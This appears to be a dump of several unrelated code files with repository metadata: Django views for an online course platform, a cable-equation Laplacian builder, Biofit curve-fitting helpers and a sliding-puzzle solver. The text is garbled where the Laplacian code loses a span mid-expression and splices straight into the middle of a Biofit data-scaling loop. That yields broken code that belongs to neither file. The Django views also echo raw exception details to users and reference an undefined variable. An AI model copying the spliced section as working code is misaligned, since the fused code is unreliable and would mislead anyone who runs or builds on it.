form.cleaned_data['description']\n cursor.execute('INSERT INTO main_refundrequest (reason, status, cno_id, s_username_id, date) '\n 'VALUES (%s, %s, %s, %s, curdate());',\n [description, 0, course_cno, request.user.id])\n cursor.close()\n return render(request, \"trivial/success_message_after_submitting.html\",\n {'success_message': 'Your refund request has been sent to the administrators. '\n 'You will get an answer in approximately a week. 
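The complaint and refund views in the record above always hand user input to `cursor.execute` through `%s` placeholders rather than splicing it into the SQL string. A minimal, dependency-free sketch of the same pattern, with sqlite3's `?` placeholders standing in for Django's `%s`:

```python
import sqlite3

# Minimal sketch of the placeholder pattern the views above rely on.
# sqlite3 uses '?' where Django's backend uses '%s'; the principle is the
# same: the driver passes values as data, so hostile input can never
# terminate the SQL statement and inject extra commands.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE complaint (description TEXT, course_id INTEGER)")

description = "refund please'; DROP TABLE complaint; --"  # hostile input
conn.execute(
    "INSERT INTO complaint (description, course_id) VALUES (?, ?)",
    (description, 42),  # bound as parameters, not concatenated
)

print(conn.execute("SELECT COUNT(*) FROM complaint").fetchone()[0])  # -> 1
```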
Please be patient.',\n 'course_slug': course_slug})\n cursor.close()\n return HttpResponseRedirect('/')\n\n\ndef make_slug_for_url(name, for_course=True):\n orig_slug = slugify(name)\n\n # check for the existence of the same slug below so that the slug is unique\n unique = False\n uniquifier = 1\n slug = orig_slug\n while not unique:\n cursor = connection.cursor()\n if for_course:\n cursor.execute('select count(*) from courses_course where slug = %s;', [orig_slug])\n else:\n cursor.execute('select count(*) from courses_lecture where lecture_slug = %s;', [orig_slug])\n count = cursor.fetchone()\n\n if count:\n count = count[0]\n\n cursor.close()\n if count != 0:\n orig_slug = slug + '-' + str(uniquifier)\n print(\"Result slug: \", orig_slug)\n uniquifier += 1\n else:\n unique = True\n\n return orig_slug\n\n\nclass AddCourseView(View):\n template_name = \"courses/add_course.html\"\n\n def get(self, request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/')\n cursor = connection.cursor()\n\n cursor.execute('select count(*) '\n 'from accounts_instructor '\n 'where student_ptr_id = %s;', [request.user.id])\n is_instructor = cursor.fetchone()\n\n if is_instructor:\n is_instructor = is_instructor[0]\n\n cursor.close()\n\n if is_instructor == 0: # this means that there is no instructor with the requested id\n return HttpResponseRedirect('/') # TODO: A page to transform student into instructor\n\n form = CreateCourseForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic order by topicname;')\n\n return render(request, self.template_name, {'user_type': user_type,\n 'form': form,\n 'add_message': 'Add a course as an instructor:',\n 'create_button': 'Create a course!',\n 'topic_list': topic_list})\n\n def post(self, request):\n form = CreateCourseForm(request.POST, request.FILES)\n\n if form.is_valid():\n cname = form.cleaned_data['cname']\n price = form.cleaned_data['price']\n topics = form.cleaned_data.get('topic')\n thumbnail = form.cleaned_data['course_img']\n\n description = form.cleaned_data['description']\n private = form.cleaned_data['private']\n\n orig_slug = make_slug_for_url(cname)\n\n cursor = connection.cursor()\n try:\n cursor.execute('insert into courses_course (cname, price, slug, is_private, course_img, '\n 'description, owner_id) VALUES (%s, %s, %s, %s, %s, %s, %s);',\n [cname, price, orig_slug, private, thumbnail, description, request.user.id])\n finally:\n cursor.close()\n\n cursor = connection.cursor()\n try:\n cursor.execute('select cno from courses_course where cname = %s;', [cname])\n cno = cursor.fetchone()\n\n if cno:\n cno = cno[0]\n\n for topic in topics:\n cursor.execute('insert into main_course_topic (cno_id, topicname_id) VALUES (%s, %s);',\n [cno, topic])\n except Error:\n return HttpResponse(\"There was an error.
    \" + str(sys.exc_info()))\n finally:\n cursor.close()\n\n warning_message = \"Success: Course submission is successful.\"\n return MainView.get(self, request, warning_message)\n\n\nclass AddLectureToCourseView(View):\n template_name = \"courses/add_course.html\"\n\n def get(self, request, course_slug):\n cursor = connection.cursor()\n cursor.execute('select owner_id, cname, cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n cursor.close()\n if not cno_row: # no course with this course slug (i.e. URL)\n warning_message = \"No course with this name\"\n return MainView.get(self, request, warning_message)\n\n owner_id = cno_row[0]\n cname = cno_row[1]\n cno = cno_row[2]\n # if the owner is not the user logging in, return to main page\n if request.user.id != owner_id:\n warning_message = \"You cannot access this page\"\n return MainView.get(self, request, warning_message)\n\n cursor = connection.cursor()\n cursor.execute('select is_complete from courses_course where cno = %s;', [cno])\n is_complete = cursor.fetchone()[0]\n if is_complete == 1:\n warning_message = \"Error: You cannot add any more lectures to this course. The course is marked as complete.\"\n return CourseDetailView.get(self, request, warning_message)\n\n message = 'Add a lecture to ' + cname\n\n form = CreateLectureForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select * from main_topic order by topicname;')\n\n return render(request, self.template_name, {'user_type': user_type, 'form': form, 'add_message': message,\n 'create_button': 'Create a lecture!',\n 'topic_list': topic_list, })\n\n def post(self, request, course_slug):\n cursor = connection.cursor()\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n cursor.close()\n if not cno_row: # no course with this course slug (i.e. 
URL)\n return HttpResponseRedirect('/') # return to main page\n cno = cno_row[0]\n\n form = CreateLectureForm(request.POST)\n\n if form.is_valid():\n lecture_name = form.cleaned_data['lecture_name']\n lecture_url = form.cleaned_data['lecture_url']\n\n lecture_slug = make_slug_for_url(lecture_name, for_course=False)\n\n cursor = connection.cursor()\n cursor.execute('INSERT INTO courses_lecture (lecture_name, lecture_slug, video_url, cno_id) VALUES '\n '(%s, %s, %s, %s);', [lecture_name, lecture_slug, lecture_url, cno])\n\n warning_message = \"Success: Lecture submission is successful.\"\n return CourseDetailView.get(self, request, course_slug, warning_message)\n\n\nclass ChangeCourseSettingsView(View):\n template_name = \"courses/course_edit.html\"\n\n def check_validity(self, course_slug):\n cursor = connection.cursor()\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n if not cno_row: # this means that the course does not exist\n return -1\n cno = cno_row[0]\n\n cursor.execute('select course_topic_id, topicname_id from main_course_topic where cno_id = %s;', [cno])\n course_topic_id = cursor.fetchone()\n\n if course_topic_id:\n course_topic_id = course_topic_id[0]\n\n cursor.close()\n\n return cno, course_topic_id\n\n def get(self, request, course_slug, warning_message = None):\n if request.user.is_authenticated: # if the user has logged in\n cno_course_topic_id = self.check_validity(course_slug)\n\n if cno_course_topic_id == -1:\n return HttpResponseRedirect('/')\n cno, course_topic_id = cno_course_topic_id[0], cno_course_topic_id[1]\n\n course = Course.objects.raw('select * from courses_course where cno = %s;', [cno])[0]\n if course.owner_id != request.user.id:\n return HttpResponseRedirect('/')\n\n course_form = EditCourseForm(instance=course)\n\n cursor = connection.cursor()\n try:\n cursor.execute('select user_type from auth_user where id = %s;', [request.user.id])\n user_type = cursor.fetchone()\n\n if user_type:\n user_type = user_type[0]\n\n finally:\n cursor.close()\n\n cursor = connection.cursor()\n\n cursor = connection.cursor()\n cursor.execute('''SELECT U.username \n FROM main_contributor AS MC,auth_user AS U\n WHERE MC.cno_id = %s AND MC.user_id = U.id;''', [cno])\n\n contributor_list = cursor.fetchall()\n contributors = [None] * len(contributor_list)\n for i in range(0, len(contributors)):\n contributors[i] = contributor_list[i][0]\n print(contributor_list[i][0])\n\n cursor.close()\n\n contributor_form = AddContributorForm()\n\n topic_list = Topic.objects.raw('select * from main_topic;')\n\n return render(request, self.template_name, {'course_form': course_form, 'course': course,\n 'user_type': user_type, 'topic_list': topic_list,\n 'course_slug': course_slug, 'contributors': contributors,\n 'warning_message': warning_message})\n return HttpResponseRedirect('/')\n\n def post(self, request, course_slug):\n cno_course_topic_id = self.check_validity(course_slug)\n\n if cno_course_topic_id == -1:\n return HttpResponseRedirect('/')\n cno, course_topic_id = cno_course_topic_id[0], cno_course_topic_id[1]\n course_form = EditCourseForm(request.POST, request.FILES,\n instance=Course.objects.raw('select * from courses_course where cno = %s;',\n [cno])[0])\n if course_form.is_valid():\n cname = course_form.cleaned_data['cname']\n price = course_form.cleaned_data['price']\n course_img = course_form.cleaned_data['course_img']\n description = course_form.cleaned_data['description']\n private = 
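`make_slug_for_url` in the views record above retries with a numeric suffix until the candidate slug is unused (each candidate is rebuilt from the base slug saved before the loop). A self-contained sketch of that loop, with a toy `slugify` and an in-memory `taken` set standing in for the database existence check:

```python
import re

def slugify(name: str) -> str:
    # Tiny stand-in for django.utils.text.slugify.
    return re.sub(r"[^a-z0-9]+", "-", name.lower()).strip("-")

def make_unique_slug(name: str, taken: set) -> str:
    # Same idea as make_slug_for_url above: append -1, -2, ... to the
    # base slug until the candidate is not already taken.
    base = slugify(name)
    candidate, n = base, 1
    while candidate in taken:
        candidate = f"{base}-{n}"
        n += 1
    return candidate

taken = {"intro-to-sql", "intro-to-sql-1"}
print(make_unique_slug("Intro to SQL!", taken))  # -> intro-to-sql-2
```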
course_form.cleaned_data['is_private']\n\n cursor = connection.cursor()\n cursor.execute('update courses_course '\n 'set cname = %s, price = %s, course_img = %s, description = %s, is_private = %s '\n 'where cno = %s;', [cname, price, course_img, description, private, cno])\n cursor.close()\n\n contributor_form = AddContributorForm(request.POST)\n cursor = connection.cursor()\n if contributor_form.is_valid():\n contributor_username = contributor_form.cleaned_data['addcontributor']\n cursor.execute('SELECT id FROM auth_user, accounts_instructor WHERE username = %s AND student_ptr_id = id;', [contributor_username])\n c_id_list = cursor.fetchone()\n if (c_id_list == None):\n cursor.close()\n\n warning_message = \"There is no instructor with this username.\"\n return ChangeCourseSettingsView.get(self, request, course_slug, warning_message)\n c_id = c_id_list[0];\n\n cursor.execute('SELECT user_id FROM main_contributor WHERE cno_id = %s and user_id = %s;', [cno, c_id])\n if not cursor.fetchone():\n cursor.execute('INSERT INTO main_contributor(cno_id, user_id) VALUES( %s, %s); ',\n [cno, c_id])\n return HttpResponseRedirect('/' + course_slug + '/edit')\n\n cursor.close()\n return HttpResponseRedirect('/' + course_slug)\n\n\nclass DeleteContributerView(View):\n def post(self, request, course_slug, c_username, *args, **kwarg):\n\n cursor = connection.cursor()\n\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n if not cno_row: # no course with this course slug (i.e. URL)\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + edit) # return to main page\n cno = cno_row[0]\n\n cursor.execute('SELECT id FROM auth_user WHERE username = %s;', [c_username])\n c_id_list = cursor.fetchone()\n if (c_id_list == None):\n return HttpResponseRedirect(\"/\" + course_slug + \"/\" + edit)\n c_id = c_id_list[0];\n\n cursor.execute('DELETE FROM main_contributor WHERE cno_id = %s AND user_id = %s;', [cno, c_id])\n\n cursor.close()\n return HttpResponseRedirect(\"/\" + course_slug + \"/edit\")\n\n\nclass OfferAdView(View):\n template_name = \"courses/offer_ad.html\"\n\n def get(self, request, course_slug):\n form = OfferAdForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n topic_list = Topic.objects.raw('select topicname from main_topic;')\n\n context = {'user_type': user_type,\n 'form': form,\n 'path': request.path,\n 'topic_list': topic_list,\n }\n\n return render(request, self.template_name, context)\n\n def post(self, request, course_slug):\n form = OfferAdForm(request.POST, request.FILES)\n if form.is_valid():\n ad_img = form.cleaned_data[\"ad_img\"]\n status = 0 # 0 for waiting, 1 for refused, 2 for accepted\n price = form.cleaned_data[\"price\"]\n startdate = form.cleaned_data[\"start_date\"]\n finishdate = form.cleaned_data[\"end_date\"]\n\n cursor = connection.cursor()\n cursor.execute('select cno from courses_course where slug = %s;', [course_slug])\n cno_row = cursor.fetchone()\n cursor.close()\n if not cno_row: # no course with this course slug (i.e. 
URL)\n return HttpResponseRedirect('/') # return to main page\n cno = cno_row[0]\n\n cursor = connection.cursor()\n cursor.execute('INSERT INTO main_advertisement (advertisement, status, payment, startdate, finishdate,'\n ' ad_username_id, cno_id) VALUES (%s, %s, %s, %s, %s, %s, %s);',\n [ad_img, status, price, startdate, finishdate, request.user.id, cno])\n cursor.close()\n return redirect(\"main:offers\")\n\n\ndef mark_as_complete(request, course_slug):\n if request.user.is_authenticated:\n # check for user type\n user_type = get_user_type(request)\n if user_type != 1: # not an instructor\n return HttpResponseRedirect('/')\n # check if the user is the owner\n cursor = connection.cursor()\n try:\n cursor.execute('select cno, owner_id from courses_course where slug = %s;', [course_slug])\n owner_row = cursor.fetchone()\n if not owner_row: # the course does not exist\n return HttpResponseRedirect('/')\n\n # checking for the owner themselves\n cno = owner_row[0] # will be useful in the update statement below\n owner_id = owner_row[1]\n if owner_id != request.user.id: # the user is not the owner\n return HttpResponseRedirect('/')\n\n # now we can finally mark the course as complete\n cursor.execute('update courses_course set is_complete = 1 where cno = %s;', [cno])\n response_str = '/' + course_slug\n return redirect(response_str)\n except Error:\n return HttpResponse(\"There was an error.
    \" + str(sys.exc_info()))\n finally:\n cursor.close()\n\n return HttpResponseRedirect('/')\n","repo_name":"isikozsoy/CS353_OnlineCoursePlatform_Group3","sub_path":"mayacat/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":63852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18881700034","text":"\"\"\"\n**IF THERE IS A FUNCTION YOU CAN'T FIND THE FUNCTION ITS PROBABLY PLACED IN THE UTILITIES**\n\"\"\"\n# Imports \nimport numpy as np\nfrom utilities import *\nimport os\nimport hh\n\n# Prints the arrays properly with elements as X.YYY\nnp.set_printoptions(precision=3)\n\n\ndef create_sheets():\n # A key observation from the cable equation implementation is that we have two sheets to represent the intracellular and extracellular space\n # The sheet will comprise of arrays of columns. Thus to get the actual sheet just call transpose on the sheet.\n n_rows = 10\n n_columns = 15\n # The intracellular space is initally at a potential of -70 mV\n intra = np.zeros([n_columns, n_rows ])\n intra += -70\n # The extracellular space is initally at a potential of 0 mV\n extra = np.zeros([n_columns, n_rows ])\n return intra, extra\n \ndef create_laplace_matrix(V, c):\n # Takes in either intra or extra flattens it then and makes the respective Laplacian\n flattened= flat(V)\n L = []\n size = len(flattened)\n # this is the number that changes according to the size of matrix (the m value of matrix) \n buffer_number = len(V[0])\n temp = []\n\n # The main diagonal\n for i in range(len(V)):\n for j in range(len(V[i])):\n # Three point stencil\n if (i==0 and j==0) or (i==(len(V)-1) and j==0) or (i==0 and j==(len(V[i])-1)) or (i==len(V)-1 and j==len(V[i])-1):\n temp.append(c*-2)\n # Four point stencil\n elif (0 set_mean[0]:\n set_mean = (np.mean(np.asarray(s)),i)\n #Make place holders for scaled data sets\n sxdata_sets = []\n sydata_sets = []\n syerr_sets = []\n #Having identified the dataset with the highest mean value itterate through other data sets and scale according to linear interpolation\n for i,s in enumerate(iydata_sets):\n #print(s)\n #If data set index is the same as that with the highest value do not need to scale so just append to list of scaled data sets and pass\n if i == set_mean[1]:\n sxdata_sets.append(ixdata_sets[i])\n sydata_sets.append(iydata_sets[i])\n syerr_sets.append(iyerr_sets[i])\n #Otherwise go through and scale values\n else:\n #To scale y data points with interpolation find values on eitherside of each in both x and y axis.\n #make a list of all scale factors\n s_factors = []\n #create place holder to scaled data sets\n sydata_set = []\n syerr_set = []\n #Itterating through data points in data set need to make sure that data sets are comparable\n for j,k in enumerate(ixdata_sets[i]):\n #make place holder for scale factor\n scale_factor = 1\n #check if x-axis value in data set with greatest mean value\n if k not in ixdata_sets[set_mean[1]]:\n #if value is not in data set with greatest mean value need to interpolate to find comparable y-axis value to determine scaling factor from\n #check that x-axis value is not larger than the largest value in data set with highest mean value\n if k < max(ixdata_sets[set_mean[1]]):\n #Itterate through data set with highest mean value and find values on either side\n for r,t in enumerate(ixdata_sets[set_mean[1]]):\n if t > k:\n x1 = ixdata_sets[set_mean[1]][r-1]\n x2 = ixdata_sets[set_mean[1]][r]\n y1 = iydata_sets[set_mean[1]][r-1]\n y2 = 
iydata_sets[set_mean[1]][r]\n #Having identified values on either side interpolate and determine scale factor\n scale_factor = (y1+((k-x1)*((y2-y1)/(x2-x1))))/iydata_sets[i][j]\n #print('i scale'+str(scale_factor))\n #append scale factor to list of scale factors\n s_factors.append((scale_factor,k))\n break\n else:\n #If the x point is outside that of the largest data set x axis range scale by the difference in maximum dataset mean average y value and the\n #mean average of the dataset considered\n scale_factor = set_mean[0]/np.mean(np.asarray(iydata_sets[i]))\n #print('over scale'+str(scale_factor))\n #having determined new scale factor then append to list of scale factors\n s_factors.append((scale_factor,k))\n #If do not need to interpolate to find value go directly ahead and calculate scale factor\n else:\n scale_factor = iydata_sets[set_mean[1]][j]/iydata_sets[i][j]\n #print('scale'+str(scale_factor))\n #append scale factor to list of scale factors\n s_factors.append((scale_factor,k))\n #having determined scale factor then want to scale value and append to scaled y axis list\n sydata_set.append(iydata_sets[i][j]*scale_factor)\n #Still need to scale y_err set\n #initially look up the percentage error associated with error in original data sets\n syerr_set.append((iyerr_sets[i][j]/iydata_sets[i][j])*(iydata_sets[i][j]*scale_factor))\n #having determined scale list then want to append list to lists of scaled data\n sxdata_sets.append(ixdata_sets[i])\n sydata_sets.append(sydata_set)\n syerr_sets.append(syerr_set)\n\n #Having scaled all datasets to use then return them\n return (sxdata_sets,sydata_sets,syerr_sets)\n\n#Function to estimate variables of menten and extended models\ndef comb_set(no_datasets,scale,xdata_sets,ydata_sets,yerr_sets,x0_replace,error):\n #Determine x and y axis data sets from individual or combined datasets\n #Initially consider if need to scale data\n if no_datasets != 1:\n if scale == 'Yes':\n #Scaling data to account for variation in y axis due to intercell variablilty in maximum production or growth rates\n sxdata,sydata,syerr = data_scalar(xdata_sets,ydata_sets,yerr_sets)\n #Combine and average scaled data sets\n xdata,ydata = avg_set(sxdata,sydata,x0_replace)\n if error == 'Yes':\n yerr = avg_set(sxdata,syerr,x0_replace)[1]\n #print(yerr)\n else:\n yerr = []\n pass\n else:\n xdata,ydata = avg_set(xdata_sets,ydata_sets,x0_replace)\n if error == 'Yes':\n yerr = avg_set(xdata_sets,yerr_sets,x0_replace)[1]\n #print(yerr)\n else:\n yerr = []\n pass\n else:\n xdata,ydata = avg_set(xdata_sets,ydata_sets,x0_replace)\n if error == 'Yes':\n yerr = avg_set(xdata_sets,yerr_sets,x0_replace)[1]\n #print(yerr)\n else:\n yerr = []\n pass\n #print(xdata)\n #print(ydata)\n return (xdata,ydata,yerr)\n\n#Function to determine number of steps between x points to plot, want to find average difference between x axis points\n#and then take number of steps equal to x_plotno between each x-axis point\ndef xsteps(xdata,x_plotno,xmin_plot,max_check,max_x):\n #Make list of xaxis differences\n xdif_lst = []\n for i in range(len(xdata)):\n #Want to stop look when difference between last two values has been found\n if i == len(xdata)-1:\n break\n else:\n #calculate difference between x points then append to list\n xdif_lst.append(abs(xdata[i+1]-xdata[i]))\n #convert list to numpy array and then calculate mean average before finding x_plotno of this difference\n xdif_avg = np.mean(np.array(xdif_lst))/x_plotno\n #Make xdif_avg is appropriate to capture smaller values\n if xdif_avg > xdata[1]:\n 
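The cable-equation record above hand-assembles a 2-D Laplacian, giving corner nodes a -2 diagonal, edge nodes -3, and interior nodes -4 (times a constant c). Assuming that corresponds to the usual no-flux boundary treatment, the same matrix falls out of a Kronecker sum of two 1-D second-difference operators; a NumPy sketch:

```python
import numpy as np

def neumann_1d(n: int) -> np.ndarray:
    # 1-D second-difference matrix with no-flux ends: tridiagonal
    # (1, -2, 1) with -1 instead of -2 at both endpoints.
    T = (np.diag(-2.0 * np.ones(n))
         + np.diag(np.ones(n - 1), 1)
         + np.diag(np.ones(n - 1), -1))
    T[0, 0] = T[-1, -1] = -1.0
    return T

def laplacian_2d(rows: int, cols: int, c: float = 1.0) -> np.ndarray:
    # The Kronecker sum reproduces the hand-built stencils above:
    # corners get a -2 diagonal, edges -3, interior nodes -4, times c.
    Tr, Tc = neumann_1d(rows), neumann_1d(cols)
    return c * (np.kron(np.eye(cols), Tr) + np.kron(Tc, np.eye(rows)))

L = laplacian_2d(10, 15)
print(L.shape, L.diagonal().min(), L.diagonal().max())  # (150, 150) -4.0 -2.0
```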
xdif_avg = xdata[1]\n else:\n pass\n #check if want to plot to maximum x_axis value or higher\n if max_check == 'Yes':\n xdata_plot = pd.Series(np.arange(xmin_plot,max(xdata),xdif_avg))\n else:\n xdata_plot = pd.Series(np.arange(xmin_plot,max_x,xdif_avg))\n\n return xdata_plot\n\n#Function to estimate menten emperical kenetic parameters\ndef esti_var(Estimated_var,ydata,xdata):\n #For Han and Luong need to to know Smin - this must be a value greater than the largest experimental x-axis value\n Smin = max(xdata)\n if Estimated_var == 'Yes':\n #Estimating variables used in fitting data to curve\n #Take mu or equivilant vmax as the maximum y axis data point\n mu = max(ydata)\n #As the real value to mu may be greater or smaller than the maximum experimental value set mu/vmax estimated bounds to be 10% either side of experimental value\n mu_min = mu - (0.1*mu)\n mu_max = mu + (0.1*mu)\n #Ks is half the concentration at which maximum rate occours to find KS initially find half of maximum rate\n #then determine list indices which either side of half maximum rate to retrieve from x data set\n for i,j in enumerate(ydata):\n if j > max(ydata)/2:\n if i == 0:\n Ks_max = xdata[i+1]\n Ks_min = xdata[i+1]*1e-13\n else:\n Ks_max = xdata[i]\n Ks_min = xdata[i-1]\n break\n if Ks_min == 0:\n Ks_min = 1e-15\n bounds = {'Menten':([mu_min,Ks_min],[mu_max,Ks_max]),'Inverse_Monod':([mu_min,Ks_min],[mu_max,Ks_max]),'exp_growth':([mu_min],[mu_max]),\n 'Han':([mu_min,Ks_min],[mu_max,Ks_max]),'Luong':([mu_min,Ks_min],[mu_max,Ks_max]),'Andrews':([mu_min,Ks_min],[mu_max,Ks_max]),'Aiba':([mu_min,Ks_min],[mu_max,Ks_max]),\n 'Moser':([mu_min,Ks_min],[mu_max,Ks_max]),'Edward':([mu_min,Ks_min],[mu_max,Ks_max]),'Webb':([mu_min,Ks_min],[mu_max,Ks_max]),'Yano':([mu_min,Ks_min],[mu_max,Ks_max]),\n 'Haldane':([mu_min,Ks_min],[mu_max,Ks_max])}\n\n #bounds = ([mu_min,Ks_min],[mu_max,Ks_max])\n else:\n bounds = {'Menten':([1e-18,1e-18],[np.inf,np.inf]),'Inverse_Monod':([1e-18,1e-18],[np.inf,np.inf]),'exp_growth':([1e-18],[np.inf]),\n 'Han':([1e-18,1e-18],[np.inf,np.inf]),'Luong':([1e-18,1e-18],[np.inf,np.inf]),'Andrews':([1e-18,1e-18],[np.inf,np.inf]),'Aiba':([1e-18,1e-18],[np.inf,np.inf]),\n 'Moser':([1e-18,1e-18],[np.inf,np.inf]),'Edward':([1e-18,1e-18],[np.inf,np.inf]),'Webb':([1e-18,1e-18],[np.inf,np.inf]),'Yano':([1e-18,1e-18],[np.inf,np.inf]),\n 'Haldane':([1e-18,1e-18],[np.inf,np.inf])}\n #bounds = ([1e-18,1e-18],[np.inf,np.inf])\n\n #Create dictionary of additional bounds to be applied to each model, these are inserted into curve fit to set limits to which parameters may fall, with and without\n #estimiated parameters as these additional parameters may not be estimated from menten kenetics theory\n ad_bounds = {'Menten':([],[]),'Inverse_Monod':([],[]),'exp_growth':([],[]),'Han':([Smin,-np.inf,-np.inf],[np.inf,np.inf,np.inf]),'Luong':([Smin,-np.inf],[np.inf,np.inf])\n ,'Andrews':([1e-13],[np.inf]),'Aiba':([0],[np.inf]),'Moser':([0],[np.inf]),'Edward':([1e-13],[np.inf]),'Webb':([1e-13,-np.inf],[np.inf,np.inf]),\n 'Yano':([1e-13,-np.inf],[np.inf,np.inf]),'Haldane':([1e-13,Smin],[np.inf,np.inf])}\n\n return (Smin,bounds,ad_bounds)\n","repo_name":"ristojm/Biofit","sub_path":"Biofit_functions.py","file_name":"Biofit_functions.py","file_ext":"py","file_size_in_byte":16770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"809502621","text":"from __future__ import annotations\nfrom sys import argv\nfrom functools import lru_cache\nfrom collections import deque, 
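The Biofit record above derives fitting bounds from the data itself: mu within 10% of the observed maximum rate, and Ks bracketed around the substrate level at half-maximal rate. A minimal sketch of handing such bounds to `scipy.optimize.curve_fit` on synthetic Michaelis-Menten data (the parameter values here are illustrative only):

```python
import numpy as np
from scipy.optimize import curve_fit

def menten(S, mu_max, Ks):
    # Michaelis-Menten / Monod rate law.
    return mu_max * S / (Ks + S)

# Synthetic data generated from known parameters plus a little noise.
rng = np.random.default_rng(0)
S = np.linspace(0.1, 10, 25)
v = menten(S, 1.2, 0.8) + rng.normal(0, 0.02, S.size)

# Bounds in the spirit of esti_var above: mu within 10% of the observed
# maximum, Ks between ~0 and the largest substrate level tested.
mu_obs = v.max()
bounds = ([0.9 * mu_obs, 1e-15], [1.1 * mu_obs, S.max()])

popt, pcov = curve_fit(menten, S, v, p0=[mu_obs, 1.0], bounds=bounds)
print(popt)  # close to the true [1.2, 0.8]
```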
defaultdict\nfrom typing import List, Tuple, Generator, Dict, DefaultDict, Deque, Union\n\n\nclass Puzzle(object):\n def __init__(\n self,\n puzzle: List[List[int]],\n x: Union[int, None] = None,\n y: Union[int, None] = None,\n ) -> None:\n \"\"\"\n Constructor for the Puzzle class. Requires the puzzle 2D list\n that represents the puzzle. Optionally takes the x and y index\n positions of the empty space in the puzzle. If not given, they\n will be calculated.\n \"\"\"\n self.puzzle = puzzle\n if x and y:\n self.x: int = x\n self.y: int = y\n return\n # Loop through the puzzle and search for the empty space\n for Y, row in enumerate(puzzle):\n for X, v in enumerate(row):\n if v == 0:\n self.y: int = Y\n self.x: int = X\n return\n # If the given puzzle does not have an empty space signified by a 0\n raise Exception(f\"Puzzle {puzzle} does not have any empty space (0)\")\n\n @staticmethod\n def read_from_file(filename: str) -> Puzzle:\n \"\"\"Read and generate a puzzle from a file\"\"\"\n with open(filename, \"r\") as f:\n w, h = map(int, f.readline().split())\n return Puzzle([[int(v) for v in f.readline().split()] for _ in range(h)])\n\n @staticmethod\n def solved_of_size(n: int) -> Puzzle:\n \"\"\"Generate a solved puzzle of size (n x n)\"\"\"\n answer: List[List[int]] = []\n for i in range(n - 1):\n answer.append(list(range(i * n + 1, (i + 1) * n + 1)))\n answer.append(list(range((n - 1) * n + 1, n * n)) + [0])\n return Puzzle(answer)\n\n def to_tuple(self) -> Tuple[Tuple[int]]:\n \"\"\"Convert the puzzle object into a tuple of tuples (for use in a dict)\"\"\"\n return tuple(tuple(row) for row in self.puzzle)\n\n def move_into_empty(self, x: int, y: int) -> None:\n \"\"\"Move the tile at a given position into the empty space\"\"\"\n self.puzzle[self.y][self.x], self.puzzle[y][x] = (\n self.puzzle[y][x],\n self.puzzle[self.y][self.x],\n )\n self.y, self.x = y, x\n\n def next_moves(self) -> Generator[Puzzle]:\n \"\"\"Given the current state of the puzzle, find all possible moves\"\"\"\n around: List[Tuple[int]] = [\n (self.x - 1, self.y),\n (self.x + 1, self.y),\n (self.x, self.y - 1),\n (self.x, self.y + 1),\n ]\n # Look around at all valid neighbors\n for nx, ny in around:\n if (0 <= nx < len(self.puzzle[0])) and (0 <= ny < len(self.puzzle)):\n # Make a copy of the base puzzle\n next_puzzle = self.__copy__()\n # Perform the appropriate swap\n next_puzzle.move_into_empty(nx, ny)\n # Yield the newly created puzzle\n yield next_puzzle\n\n def __copy__(self) -> Puzzle:\n \"\"\"Create a deep copy of a Puzzle object\"\"\"\n return Puzzle([row.copy() for row in self.puzzle], x=self.x, y=self.y)\n\n def __str__(self) -> str:\n \"\"\"to string method for the Puzzle class\"\"\"\n return \"\\n\".join(\n \" \".join(map(lambda v: f\"{v:2d}\" if v else \" \", row))\n for row in self.puzzle\n )\n\n\nclass PuzzleSolver(object):\n def __init__(self, n: int) -> None:\n \"\"\"Constructor for the PuzzleSolver class\"\"\"\n # Generate a solved puzzle of size (n x n)\n solved: Puzzle = Puzzle.solved_of_size(n)\n\n # Initialize the solver dictionary.\n # The value at a given puzzle is it's parent puzzle.\n # This parent puzzle is the puzzle is the result of the transformation\n # that should be made on the current puzzle to optimally solve.\n self.solver: Dict[Tuple[Tuple[int]] : Tuple[Tuple[int]]] = dict()\n # The solved puzzle has no parent. 
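The `PuzzleSolver` in the record above works backwards: a single breadth-first search from the solved board records, for every reachable state, the parent state one optimal move closer to the solution. A stripped-down sketch of that parent-map idea on a toy state space:

```python
from collections import deque

def bfs_parents(start, neighbors):
    # Breadth-first search from `start`; parents[s] is the state one
    # optimal step closer to `start`, like PuzzleSolver.solver above.
    parents = {start: None}
    queue = deque([start])
    while queue:
        state = queue.popleft()
        for nxt in neighbors(state):
            if nxt not in parents:  # first visit == shortest path in BFS
                parents[nxt] = state
                queue.append(nxt)
    return parents

# Toy state space: integers 0..15, a "move" adds or subtracts 1.
parents = bfs_parents(0, lambda s: [x for x in (s - 1, s + 1) if 0 <= x <= 15])

def steps_to_solve(state, parents):
    n = 0
    while parents[state] is not None:
        state, n = parents[state], n + 1
    return n

print(steps_to_solve(9, parents))  # -> 9
```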
